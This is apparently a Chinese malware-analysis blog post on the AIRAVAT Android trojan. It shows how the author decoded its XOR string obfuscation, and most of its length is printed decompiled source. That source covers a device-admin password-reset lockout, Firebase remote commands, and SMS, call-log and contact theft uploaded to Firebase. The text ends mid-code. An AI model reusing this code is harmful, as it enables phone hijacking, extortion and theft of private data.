- 背景
- 分析
- 解密字符串
- StringFogImpl.decrypt函数
- 大丈夫
- Xor(Base64.DeCode(str), “UTF-8”)XOR(%7B’option’:’UTF8’,’string’:’UTF-8’%7D,’Standard’,false)&input=6L6T5YWl5a%2BG5paH)">Xor(Base64.DeCode(str), “UTF-8”)XOR(%7B’option’:’UTF8’,’string’:’UTF-8’%7D,’Standard’,false)&input=6L6T5YWl5a%2BG5paH)
- 功能
- 解密字符串
- Python解密
- coding: UTF-8
- 读取需要解密的文本文件
- 解密后保存为文本文件输出
- 检测文本是否需要解密
- 解密字符串
- 因为有超出7B的值,所以不能转UTF-8再解密
背景
项目里教了怎么将.apk文件里的ID替换为攻击者的ID,但是没有公开JAVA代码,自己想分析看看:
22.07.13-Cyble - 能够勒索的多功能安卓木马AIRAVAT
分析
解密字符串
敏感的字符串都被加密了,解密函数为“StringFogImpl.decrypt”:
很明显是有Base64编码过,直接尝试Base64解码,不对:
StringFogImpl.decrypt函数
加密(“encrypt”):Xor str2后Base64编码
解密(“decrypt”):Base64解码后Xor str2:
找了很久,都没找到str2的值。
大丈夫
异或是可逆的。
从报告里找对应的一对“密文”-“明文”。密文Base64解码后Xor明文XOR(%7B’option’:’UTF8’,’string’:’UTF-8’%7D,’Standard’,false)&input=6L6T5YWl5a%2BG5paH),即可得Xor的另一个值:
- 明文:dmpsms
- 密文:MTk2XlUm
获取Xor的另一个字符串:
原来异或的另一个字符串,是“UTF-8”!
Xor(Base64.DeCode(str), “UTF-8”)XOR(%7B’option’:’UTF8’,’string’:’UTF-8’%7D,’Standard’,false)&input=6L6T5YWl5a%2BG5paH)
功能
设置密码并锁屏
devicePolicyManager.setPasswordQuality)
public class DeviceAdminComponent extends DeviceAdminReceiver{private static final String OUR_SECURE_ADMIN_PASSWORD = "1234"public CharSequence onDisableRequested(Context context, Intent intent){ComponentName componentName = new ComponentName(context, DeviceAdminComponent.class);DevicePolicyManager devicePolicyManager = (DevicePolicyManager) context.getSystemService(device_policy);if (devicePolicyManager.isAdminActive(componentName)){devicePolicyManager.setPasswordQuality(componentName, Numeric);}devicePolicyManager.resetPassword(OUR_SECURE_ADMIN_PASSWORD, resetPasswordWithToken);devicePolicyManager.lockNow();return super.onDisableRequested(context, intent);}}
GUI-日志
logoss-AccessibilityService(辅助服务)
servicess-主要代码逻辑
从408行开始对比命令:
几乎所有有意义的字符串都被加密了,分析代码变成了体力活,解密后代码非常清晰,但是量大,此处就不继续深入分析了,具体参考:
22.07.13-Cyble - 能够勒索的多功能安卓木马AIRAVAT
Python解密
需解密字符串
service为主要的远控功能:
public void _service() {_setpres();_setpres2("");FirebaseDatabase.getInstance().getReference(StringFogImpl.decrypt("ejcpQFwmeyVCVTEn") + gui.uuii(getApplicationContext())).addChildEventListener(new ChildEventListener() { // from class: sigma.male.servicess.20@Override // com.google.firebase.database.ChildEventListenerpublic void onChildAdded(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildChanged(DataSnapshot dataSnapshot, String str) {Map map = (Map) dataSnapshot.getValue();servicess.this.cmdn = new StringBuilder().append(map.get(StringFogImpl.decrypt("NjkiQw=="))).toString();servicess.this.cmdv = new StringBuilder().append(map.get(StringFogImpl.decrypt("NjkiWw=="))).toString();servicess.this.cmdvar = new StringBuilder().append(map.get(StringFogImpl.decrypt("NjkiW1kn"))).toString();if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("NjA="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("MTk2XlUm"))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("MTk2Tlk5OA=="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("MTk2Tlc7IA=="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("MjEyXVk2PydKXSY="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("JjwjQVQ2OSI="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("MTEwRFswPShLVw=="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("ITsnXkwhMT5Z"))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("ISA1SV0j"))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("Iz0kX1khMSJITg=="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("JTgnVEs4ITVEWw=="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("JjEoSUs4Jw=="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("NjwnQ18wIydBVA=="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("OiQxSFo="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("ITsoWQ=="))) {if (!servicess.this.cmdn.equals(StringFogImpl.decrypt("ITsgS0w="))) {if (servicess.this.cmdn.equals(StringFogImpl.decrypt("NjgvXQ=="))) {servicess.this.clips();return;}return;}servicess.this.tofft();return;}servicess.this.tont();return;}servicess.this._voicere(servicess.this.cmdv);return;}servicess.this._changewall(servicess.this.cmdv);return;}servicess.this._sendsm(servicess.this.cmdv, servicess.this.cmdvar);return;}servicess.this._palysmudic(servicess.this.cmdv);return;}servicess.this._vibra(servicess.this.cmdv);return;}servicess.this._ttsdev(servicess.this.cmdv);return;}servicess.this._showtoast(servicess.this.cmdv);return;}servicess.this._devinfo();return;}servicess.this._sudoapt(servicess.this.cmdv, "");return;}servicess.this._getpackages();return;}servicess.this._dmpcon();return;}servicess.this._dmpcal();return;}servicess.this.getAllSms(servicess.this.getApplicationContext());return;}servicess.this._cd(servicess.this.cmdv, "", "");}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildRemoved(DataSnapshot dataSnapshot) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildMoved(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onCancelled(DatabaseError databaseError) {}}); // /comds/comds/comds/comds}public void _setpres() {FirebaseDatabase.getInstance().getReference(StringFogImpl.decrypt("ejsoQVE7MWk=") + gui.uuiip(getApplicationContext()) + StringFogImpl.decrypt("eiE1SEo=") + gui.uuii(getApplicationContext())).child(StringFogImpl.decrypt("MTEwRFsw")).addChildEventListener(new ChildEventListener() { // from class: sigma.male.servicess.21@Override // com.google.firebase.database.ChildEventListenerpublic void onChildAdded(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildChanged(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildRemoved(DataSnapshot dataSnapshot) {servicess.this._setpres2("");}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildMoved(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onCancelled(DatabaseError databaseError) {}});}public void _setpres2(String str) {this.responsetxt.clear();this.responsetxt = new HashMap<>();this.responsetxt.put(StringFogImpl.decrypt("JTwpQ10="), String.valueOf(Build.MANUFACTURER) + " " + Build.MODEL);this.responsetxt.put(StringFogImpl.decrypt("NDoiX1c8MA=="), StringFogImpl.decrypt("FDoiX1c8MGY=") + Build.VERSION.RELEASE);this.responsetxt.put(StringFogImpl.decrypt("NzUyWV0nLQ=="), String.valueOf(((BatteryManager) getSystemService(StringFogImpl.decrypt("NzUyWV0nLStMVjQzI18="))).getIntProperty(4)) + StringFogImpl.decrypt("cA=="));this.responsetxt.put(StringFogImpl.decrypt("PDA="), gui.uuii(getApplicationContext()));for (String str2 : new String[]{StringFogImpl.decrypt("eic/XkwwOWlMSCV7FVhIMCYzXl0neiddUw=="), StringFogImpl.decrypt("eickRFZ6JzM="), StringFogImpl.decrypt("eic/XkwwOWlPUTt7NVg="), StringFogImpl.decrypt("eic/XkwwOWlVWjw6aV5N"), StringFogImpl.decrypt("ejAnWVl6OClOWTl7Pk9RO3s1WA=="), StringFogImpl.decrypt("ejAnWVl6OClOWTl7JERWeicz"), StringFogImpl.decrypt("eic/XkwwOWleXHosJERWeicz"), StringFogImpl.decrypt("eic/XkwwOWlPUTt7IExROScnS116JzM="), StringFogImpl.decrypt("ejAnWVl6OClOWTl7NVg="), StringFogImpl.decrypt("eiczAlo8OmleTQ==")}) {if (new File(str2).exists()) {StringFogImpl.decrypt("DDE1");}}this.responsetxt.put(StringFogImpl.decrypt("JzspWV0x"), StringFogImpl.decrypt("Gzs="));DatabaseReference child = FirebaseDatabase.getInstance().getReference(StringFogImpl.decrypt("ejsoQVE7MWk=") + gui.uuiip(getApplicationContext()) + StringFogImpl.decrypt("eiE1SEo=") + gui.uuii(getApplicationContext())).child(StringFogImpl.decrypt("MTEwRFsw"));child.setValue(this.responsetxt);child.onDisconnect().removeValue();}public void _cd(final String str, String str2, String str3) {int i = 0;if (FileUtil.isExistFile(str)) {if (FileUtil.isDirectory(str)) {this.lst.clear();FileUtil.listDir(str, this.lst);this.num = 0.0d;this.str = StringFogImpl.decrypt("aTgvDQZ7eg==");while (true) {int i2 = i;if (i2 < this.lst.size()) {if (FileUtil.isDirectory(this.lst.get((int) this.num))) {this.str = this.str.concat(StringFogImpl.decrypt("aTgvDVs5NTVeBXcyKQ8Yaw==").concat(Uri.parse(this.lst.get((int) this.num)).getLastPathSegment()));} else if (Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(StringFogImpl.decrypt("eyQoSg==")) || Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(StringFogImpl.decrypt("ez42Sg==")) || Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(StringFogImpl.decrypt("ez42SF8=")) || Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(StringFogImpl.decrypt("eycwSg==")) || Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(StringFogImpl.decrypt("ez0lQg=="))) {this.str = this.str.concat(StringFogImpl.decrypt("aTgvDVs5NTVeBXc9Kw8Yaw==").concat(Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().concat(StringFogImpl.decrypt("aTZ4").concat(String.valueOf(new File(this.lst.get((int) this.num)).length() / 1024) + StringFogImpl.decrypt("HhY=").concat(StringFogImpl.decrypt("aXskEw=="))))));} else if (Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(StringFogImpl.decrypt("ezk2GQ=="))) {this.str = this.str.concat(StringFogImpl.decrypt("aTgvDVs5NTVeBXciLw8Yaw==").concat(Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().concat(StringFogImpl.decrypt("aTZ4").concat(String.valueOf(new File(this.lst.get((int) this.num)).length() / 1024) + StringFogImpl.decrypt("HhY=").concat(StringFogImpl.decrypt("aXskEw=="))))));} else {this.str = this.str.concat(StringFogImpl.decrypt("aTgvDVs5NTVeBXcyLw8Yaw==").concat(Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().concat(StringFogImpl.decrypt("aTZ4").concat(String.valueOf(new File(this.lst.get((int) this.num)).length() / 1024) + StringFogImpl.decrypt("HhY=").concat(StringFogImpl.decrypt("aXskEw=="))))));}this.num += 1.0d;i = i2 + 1;} else {_setrespo(this.str, str, "", "", "");return;}}} else if (FileUtil.isFile(str)) {BitmapFactory.Options options = new BitmapFactory.Options();options.inJustDecodeBounds = true;BitmapFactory.decodeFile(str, options);if (options.outWidth != -1 && options.outHeight != -1 && new File(str).length() / 1024 < 3072) {Date date = new Date(new File(str).lastModified());ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();BitmapFactory.decodeFile(str).compress(Bitmap.CompressFormat.JPEG, 100, byteArrayOutputStream);_setrespo(StringFogImpl.decrypt("PDkhW1EwIw=="), str, Base64.encodeToString(byteArrayOutputStream.toByteArray(), 0), StringFogImpl.decrypt("aTgvE3Y0OSMXGA==") + Uri.parse(str).getLastPathSegment() + StringFogImpl.decrypt("aTgvE3snMSdZUTo6fA0=") + date + StringFogImpl.decrypt("aTgvE2s8LiMXGA==") + (new File(str).length() / 1024) + StringFogImpl.decrypt("HhZmEVQ8ahZMTD1uZg==") + str, "");return;}this.root.child(str).putFile(Uri.fromFile(new File(str))).addOnFailureListener(this._fbs_failure_listener).addOnProgressListener(this._fbs_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.22/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.root.child(str).getDownloadUrl();}}).addOnCompleteListener(this._fbs_upload_success_listener);this.filinfodat = StringFogImpl.decrypt("aTgvE3Y0OSMXGA==") + Uri.parse(str).getLastPathSegment() + StringFogImpl.decrypt("aTgvE3snMSdZUTo6fA0=") + new Date(new File(str).lastModified()) + StringFogImpl.decrypt("aTgvE2s8LiMXGA==") + (new File(str).length() / 1024) + StringFogImpl.decrypt("HhZmEVQ8ahZMTD1uZg==") + str;}}}public void _setrespo(String str, String str2, String str3, String str4, String str5) {this.responsetxt.clear();this.responsetxt = new HashMap<>();this.responsetxt.put(StringFogImpl.decrypt("JzE1XVc="), str);this.responsetxt.put(StringFogImpl.decrypt("IzU0Hw=="), str2);this.responsetxt.put(StringFogImpl.decrypt("I2U="), str3);this.responsetxt.put(StringFogImpl.decrypt("I2Y="), str4);this.responsetxt.put(StringFogImpl.decrypt("I2c="), str5);String decrypt = StringFogImpl.decrypt("NDYlSV0zMy5EUj44K0NXJSU0XkwgIjFVQS8=");String str6 = String.valueOf(decrypt) + StringFogImpl.decrypt("ZWV0HgxgYnEVAQ==");Random random = new Random();StringBuilder sb = new StringBuilder(8);sb.append(str6.charAt(random.nextInt(str6.length() - 1)));for (int length = sb.length(); length < 8; length++) {sb.append(str6.charAt(random.nextInt(str6.length())));}this.responsetxt.put(StringFogImpl.decrypt("JzoiQA=="), sb.toString());this._firebase.getReference(StringFogImpl.decrypt("eiYjXkg6J2lfXSYkKQ==") + gui.uuii(getApplicationContext())).child(StringFogImpl.decrypt("JzE1XVc=")).setValue(this.responsetxt);}public void _dmpsm(String str) {}public void getAllSms(Context context) {Cursor query = context.getContentResolver().query(Telephony.Sms.CONTENT_URI, null, null, null, null);String decrypt = StringFogImpl.decrypt("aTwyQFRraCtITDR0KExVMGlhW1EwIzZCSiFzZk5XOyAjQ0xoczFEXCE8e0ldIz0lSBUiPSJZUHl0L0NRIT0nQRUmNydBXWhlYRMEODEyTBg7NStIBXI3LkxKJjEyChg2OyhZXTsgewptARJrFR91anpeWyc9NlkYIS02SAVyICNVTHo+J1tZJjc0REghc2ZeSjZpYUVMISQ1Fxd6NSxMQHszKUJfOTEnXVEmeiVCVXo1LExAejgvT0t6PjdYXSctaR4WYXp2AlIkISNfQXs5L0MWPydhEwR6JyVfUSUgeA0EJiA/QV1rdCRCXCwvK0xKMj0oFwhuJCdJXDw6IRcIbjYnTlMyJilYVjFuZU5bNiloTFs2OzRJUTo6PU9ZNj8hX1cgOiIAWzo4KV8CdjIgSwM2OypCSm93dh0IbjczX0s6JnxdVzw6MkhKbiQnSVw8OiEXCW0kPhZPPDAyRQJkZHYIAzc7NEldJ24oQlYwbzJIQCF5J0FRMjp8QV0zIH1CTSE4L0Ndb2R9S1c7IGteUS8xfBwNJSx9XVcmPTJEVztuNEhUNCAvW11uIDRMViY9MkRXO25oGUtuJCdJXDw6IQBUMDIyFw1lJD5QFjQ3JUJKMT0pQwI9OzBISnl6J05MPCIjVlo0Ny1KSjohKABbOjgpXwJ2NSdMRXs1JU5XJzAvQlZvNSBZXScvJUJWITEoWQJytsaXH243KUFXJ25lHQhlbyBCViF5MUhRMjwyFw9lZH1LVDo1MhdKPDMuWQMhJidDSzM7NEACJzsyTEwwfH8dXDAzbxZVNCYhRFZ4OCNLTG9hNlVFezUlWVEjMXxMXiExNFZbOjoySFYhbmHPuO9zOwNINDojQUMlNSJJUTszfB0YZGw2VQM3NSVGXyc7M0NceDcpQVcnbmVIXTBvK0xAeDwjRF89IHwdAzY7KkJKb3d2HQhuOzBISjM4KVoCPT0iSV07bzJfWTsnL1lROjp8QFkteS5IUTI8Mg0WZydmSFkmMWtCTSEpJFhMITsoDUslNShWSDonL1lROjp8TFomOypYTDBvNERfPSB8GAglLDtPTSEgKUMYPDkhVlAwPSFFTG9ndl1AbiQpXlEhPSlDAjQ2NUJUICAjFlQwMjIXCWUkPhZMOiR8HAglLH1aUTEgLhcLZSQ+UBY8Ly5IUTI8MhcLZSQ+Fk88MDJFAmZhNlUDOTEgWQJtJD4WTCc1KF5eOiYrF0s2NSpIEHttb1AWJTUoSFQuJCdJXDw6IRcIdWV+XUBuNidOUzImKVhWMXklQlQ6JnwOXTAxfUBZLXkuSFEyPDIXCG43KUFXJ25lHQhlbylbXScyKkJPbzwvSVwwOn1ZSjQ6NURMPDsoF1U0LGtFXTwzLlkYe2Y1DV00JyMAVyAgO09NISApQxgmJCdDQyU7NURMPDsoF1k3JylBTSExfV9RMjwyFw1lJD5QWiAgMkJWdT0rSkM9MS9KUCFudR1ILW82Qks8IC9CVm81JF5XOSEySAM5MSBZAmRkNlUDITs2FwllJD4WTzwwMkUCZmQ2VUVpezVZQTkxeA==");if (query != null) {int count = query.getCount();if (query.moveToFirst()) {String str = decrypt;for (int i = 0; i < count; i++) {String string = query.getString(query.getColumnIndexOrThrow(StringFogImpl.decrypt("MTUySA==")));String string2 = query.getString(query.getColumnIndexOrThrow(StringFogImpl.decrypt("NDAiX10mJw==")));String string3 = query.getString(query.getColumnIndexOrThrow(StringFogImpl.decrypt("NzsiVA==")));new Date(Long.valueOf(string).longValue());String str2 = "";String str3 = "";switch (Integer.parseInt(query.getString(query.getColumnIndexOrThrow(StringFogImpl.decrypt("IS02SA=="))))) {case 1:str2 = StringFogImpl.decrypt("PDokQkA=");str3 = StringFogImpl.decrypt("PSAyXUtve2lLUScxJExLMCcyQko0MyMDXzo7IUFdNCQvXhY2OysCTmV7JAJPPT0ySBVnNiUYXns1Nl1LJTsyA1s6OWlCFzw6JEJAeyQoSgc0ODIQVTAwL0weITstSFZoMnVOXm0wfhwVNjJ0HhVhYX4VFTcwf04VM20lHg8zYXcVAWBn");break;case 2:str2 = StringFogImpl.decrypt("JjEoWQ==");str3 = StringFogImpl.decrypt("PSAyXUtve2lLUScxJExLMCcyQko0MyMDXzo7IUFdNCQvXhY2OysCTmV7JAJPPT0ySBVnNiUYXns1Nl1LJTsyA1s6OWlCFyYxKFkWJTohElk5IHtAXTE9JwtMOj8jQwU0YSBPCmxtdQANYzZwAAwzYHIAWjRtcwANbGxzTF02YidJDDQ=");break;case 4:str2 = StringFogImpl.decrypt("OiEyT1ct");str3 = StringFogImpl.decrypt("PSAyXUtve2lLUScxJExLMCcyQko0MyMDXzo7IUFdNCQvXhY2OysCTmV7JAJPPT0ySBVnNiUYXns1Nl1LJTsyA1s6OWlCFzohMk9XLXo2Q19qNSpZBTgxIkRZcyApRl07aXRLD2VickwPeGRzTwB4YHMeDXg1cE5eeGJwGw40MXQdWjMydg==");break;}str = String.valueOf(str) + StringFogImpl.decrypt("aTYzWUw6OmZOVDQnNRAfNDclQkoxPSlDH2toL0BfdSc0TgVy") + str3 + StringFogImpl.decrypt("cnQnQUxocw==") + str2 + StringFogImpl.decrypt("cnR4") + string2 + StringFogImpl.decrypt("aSc2TFZr") + string + StringFogImpl.decrypt("aQ==") + StringFogImpl.decrypt("eg==") + StringFogImpl.decrypt("JiQnQwZp") + StringFogImpl.decrypt("eg==") + StringFogImpl.decrypt("NyEyWVc7ag==") + StringFogImpl.decrypt("aTAvWxg2OCdeS2hzNkxWMDhhEw==") + string3 + StringFogImpl.decrypt("aQ==") + StringFogImpl.decrypt("eg==") + StringFogImpl.decrypt("MT0wEw==");query.moveToNext();}decrypt = str;}query.close();decrypt = String.valueOf(decrypt) + StringFogImpl.decrypt("aSclX1ElIGZZQSUxewpMMCwyAlI0IideWyc9Nlkfa3Q=") + StringFogImpl.decrypt("MyEoTkw8OygNTDh8MgRDJzEyWEo7dChIT3UQJ1ldfWUjHhIhfWhZVxk7JUxUMAcyX1E7M24EAyhwbgpLJTUoChF7MSdOUH0yM0NbIT0pQxAheCMEQ3F8IwQWPSArQRAhOW5dWScnI2RWIXxiBV18ei5ZVTl8bwQRfClvFk40JmZEFDQ3JRBcOjczQF07IGhKXSERKkhVMDoyXnosFypMSyYaJ0BdfXMnTls6JiJEVztzbxZeOiZuRAVlby8RWTY3aEFdOzMyRQM8f20EWTY3HURlezUiSX0jMShZdDwnMkhWMCZuCls5PSVGH3kyM0NbIT0pQxB8LzJFUSZ6JUFZJicKREshejJCXzI4IwUfNDcyRE4wc28WTjQmZlkFITwvXhY7MT5ZfTkxK0hWIQcvT1Q8OiEWTHsnMlRUMHorTEAdMS9KUCFrMgNLIS0qSBY4NT5lXTwzLlkFOyEqQQIhejVZQTkxaEBZLRwjRF89IHtZFiY3NEJUORwjRF89IG0KSC1zOwQD") + StringFogImpl.decrypt("aXs1Tko8JDIT");}try {if (FileUtil.isExistFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("eicrXhY9ICtB")))) {FileUtil.deleteFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("eicrXhY9ICtB")));}FileOutputStream fileOutputStream = new FileOutputStream(String.valueOf(FileUtil.getPackageDataDir(getApplicationContext())) + StringFogImpl.decrypt("eicrXhY9ICtB"), true);fileOutputStream.write((String.valueOf(decrypt) + "\n\n").getBytes());fileOutputStream.close();this.user.child(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("eicrXhY9ICtB"))).putFile(Uri.fromFile(new File(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("eicrXhY9ICtB"))))).addOnFailureListener(this._sigmamale_failure_listener).addOnProgressListener(this._sigmamale_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.23/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.user.child(FileUtil.getPackageDataDir(servicess.this.getApplicationContext()).concat(StringFogImpl.decrypt("eicrXhY9ICtB"))).getDownloadUrl();}}).addOnCompleteListener(this._sigmamale_upload_success_listener);} catch (FileNotFoundException e) {} catch (IOException e2) {}}public void _dmpcal() {String decrypt;Context applicationContext = getApplicationContext();StringBuffer stringBuffer = new StringBuffer();stringBuffer.append(StringFogImpl.decrypt("aTwyQFRraCtITDR0KExVMGlhW1EwIzZCSiFzZk5XOyAjQ0xoczFEXCE8e0ldIz0lSBUiPSJZUHl0L0NRIT0nQRUmNydBXWhlYRMYaScyVFQwamZPVzEtPUBZJzMvQwJlbzZMXDE9KEoCZW8kTFs+MzRCTTswfA5bNjc7A1Q6LzFEXCE8fE5ZOTduFABwdGsNDmUkPgQDJTs1REw8OygXSjA4J1lRIzF9RV08My5ZAjQhMkIDJTUiSVE7M2tPVyEgKUACYCQ+Fkg0MCJEVjJ5MkJIb2VzXUBuJCdJXDw6IQBUMDIyFw5lJD4WWjQ3LUpKOiEoSQJ2MiBLAzg1NEpRO24nWEw6byRCSjExNABKNDAvWEtvZXZdQG45J19fPDprWVclbnNdQCh6KkIYPDkhVl45OydZAjkxIFkDPTEvSlAhbnUdSC1vMURcITx8HgglLH1dVyY9MkRXO24nT0s6ODNZXW4gKV0CbSQ+FlQwMjIXCWUkPlAWOTtmXkg0Oj1LVDo1MhdKPDMuWQM4NTRKUTt5NERfPSB8HwglLDsRFyYgP0Fda2gkQlwsag=="));Cursor query = applicationContext.getContentResolver().query(CallLog.Calls.CONTENT_URI, null, null, null, StringFogImpl.decrypt("MTUySBgRERVu"));int columnIndex = query.getColumnIndex(StringFogImpl.decrypt("OyErT10n"));int columnIndex2 = query.getColumnIndex(StringFogImpl.decrypt("IS02SA=="));int columnIndex3 = query.getColumnIndex(StringFogImpl.decrypt("MTUySA=="));int columnIndex4 = query.getColumnIndex(StringFogImpl.decrypt("MSE0TEw8Oyg="));while (query.moveToNext()) {String string = query.getString(columnIndex);String string2 = query.getString(columnIndex2);Date date = new Date(Long.valueOf(query.getString(columnIndex3)).longValue());String string3 = query.getString(columnIndex4);String str = "";switch (Integer.parseInt(string2)) {case 1:decrypt = StringFogImpl.decrypt("HBoFYnUcGgE=");str = StringFogImpl.decrypt("PSAyXUtve2lLUScxJExLMCcyQko0MyMDXzo7IUFdNCQvXhY2OysCTmV7JAJPPT0ySBVnNiUYXns1Nl1LJTsyA1s6OWlCFxwaBWJ1HBoBA0g7M3lMVCFpK0hcPDVgWVc+MSgQXWNidk4MYmxrFVxlbWsZXjNsaxQNZDFrTghkNX8bCjM1Ik4M");break;case 2:decrypt = StringFogImpl.decrypt("GgESanccGgE=");str = StringFogImpl.decrypt("PSAyXUtve2lLUScxJExLMCcyQko0MyMDXzo7IUFdNCQvXhY2OysCTmV7JAJPPT0ySBVnNiUYXns1Nl1LJTsyA1s6OWlCFxoBEmp3HBoBA0g7M3lMVCFpK0hcPDVgWVc+MSgQD2ZsJx4LMG1rGwhhbWsZWW1saxQMYWRrHlk2YiAVADBncB5b");break;case 3:decrypt = StringFogImpl.decrypt("GB0Vfn0R");str = StringFogImpl.decrypt("PSAyXUtve2lLUScxJExLMCcyQko0MyMDXzo7IUFdNCQvXhY2OysCTmV7JAJPPT0ySBVnNiUYXns1Nl1LJTsyA1s6OWlCFxgdFX59EXo2Q19qNSpZBTgxIkRZcyApRl07aSNPXWxgfhoOeDV1TAx4YHEbDXhsdksNeDcjFV1nN3IVDGVhcA==");break;default:decrypt = null;break;}stringBuffer.append(StringFogImpl.decrypt("aTAvWxg2OCdeS2hzKkIfdWp6RFUydDVfW2hz") + str + StringFogImpl.decrypt("cnQnQUxocw==") + decrypt + StringFogImpl.decrypt("cnR4EVpr") + string + StringFogImpl.decrypt("aXskExhpJzZMVms=") + string3 + StringFogImpl.decrypt("dQcjTgR6JzZMVmtoJF8GaTY0Ew==") + date + StringFogImpl.decrypt("aXsiRE5r"));}query.close();try {if (FileUtil.isExistFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejcnQVR7PDJAVA==")))) {FileUtil.deleteFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejcnQVR7PDJAVA==")));}FileOutputStream fileOutputStream = new FileOutputStream(String.valueOf(FileUtil.getPackageDataDir(getApplicationContext())) + StringFogImpl.decrypt("ejcnQVR7PDJAVA=="), true);fileOutputStream.write((String.valueOf(stringBuffer.toString()) + "\n\n").getBytes());fileOutputStream.close();this.user.child(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejcnQVR7PDJAVA=="))).putFile(Uri.fromFile(new File(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejcnQVR7PDJAVA=="))))).addOnFailureListener(this._sigmamale_failure_listener).addOnProgressListener(this._sigmamale_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.24/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.user.child(FileUtil.getPackageDataDir(servicess.this.getApplicationContext()).concat(StringFogImpl.decrypt("ejcnQVR7PDJAVA=="))).getDownloadUrl();}}).addOnCompleteListener(this._sigmamale_upload_success_listener);} catch (FileNotFoundException e) {} catch (IOException e2) {}}public void _dmpcon() {String str;String decrypt = StringFogImpl.decrypt("aTwyQFRraCtITDR0KExVMGlhW1EwIzZCSiFzZk5XOyAjQ0xoczFEXCE8e0ldIz0lSBUiPSJZUHl0L0NRIT0nQRUmNydBXWhlYRMENzsiVAZpJzJUVDBqZk9XMS09QFknMy9DAmVvNkxcMT0oSgJlbyRMWz4zNEJNOzB8Dls2NzsDVDovMURcITx8Tlk5N24UAHB0aw0OZSQ+BAMlOzVETDw7KBdKMDgnWVEjMX1FXTwzLlkCNCEyQgMlNSJJUTsza09XISApQAJgJD4WSDQwIkRWMnkyQkhvZXNdQG4kJ0lcPDohAFQwMjIXDmUkPhZaNDctSko6IShJAnYyIEsDODU0SlE7bidYTDpvJEJKMTE0AEo0MC9YS29ldl1AbjknX188OmtZVyVuc11AKHoqQhg8OSFWXjk7J1kCOTEgWQM9MS9KUCFudR1ILW8xRFwhPHweCCUsfV1XJj0yRFc7bidPSzo4M1ldbiApXQJtJD4WVDAyMhcJZSQ+UBY5O2ZeSDQ6PUtUOjUyF0o8My5ZAzg1NEpRO3k0RF89IHwfCCUsOxEXJiA/QV1r");Cursor query = getApplicationContext().getContentResolver().query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, new String[]{StringFogImpl.decrypt("Cj0i"), StringFogImpl.decrypt("MT01XVQ0LRlDWTgx"), StringFogImpl.decrypt("MTUyTAk="), StringFogImpl.decrypt("NDclQk07IBlZQSUx")}, StringFogImpl.decrypt("NDclQk07IBlZQSUxZhEGdXMhQlcyOCMKGA=="), null, null);if (query.getCount() > 0) {str = decrypt;while (query.moveToNext()) {str = String.valueOf(str) + StringFogImpl.decrypt("aTAvWxg2OCdeS2hzKkIfdWp6RFUydDVfW2hzLllMJSd8AhczPTRIWjQnI15MOiYnSl17MylCXzkxJ11RJnolQlV6InYCWnojLkRMMHl0T1tgMmhMSCUnNkJMezcpQBc6eyVCViF6NkNfajUqWQU4MSJEWXMgKUZdO2lySF1mZXJOW3g3d09ceGB3Glx4NnYeXXhsJx4LM2NyTwxmZ3YKGGtoJBN2NDkjFxhpeyQT") + 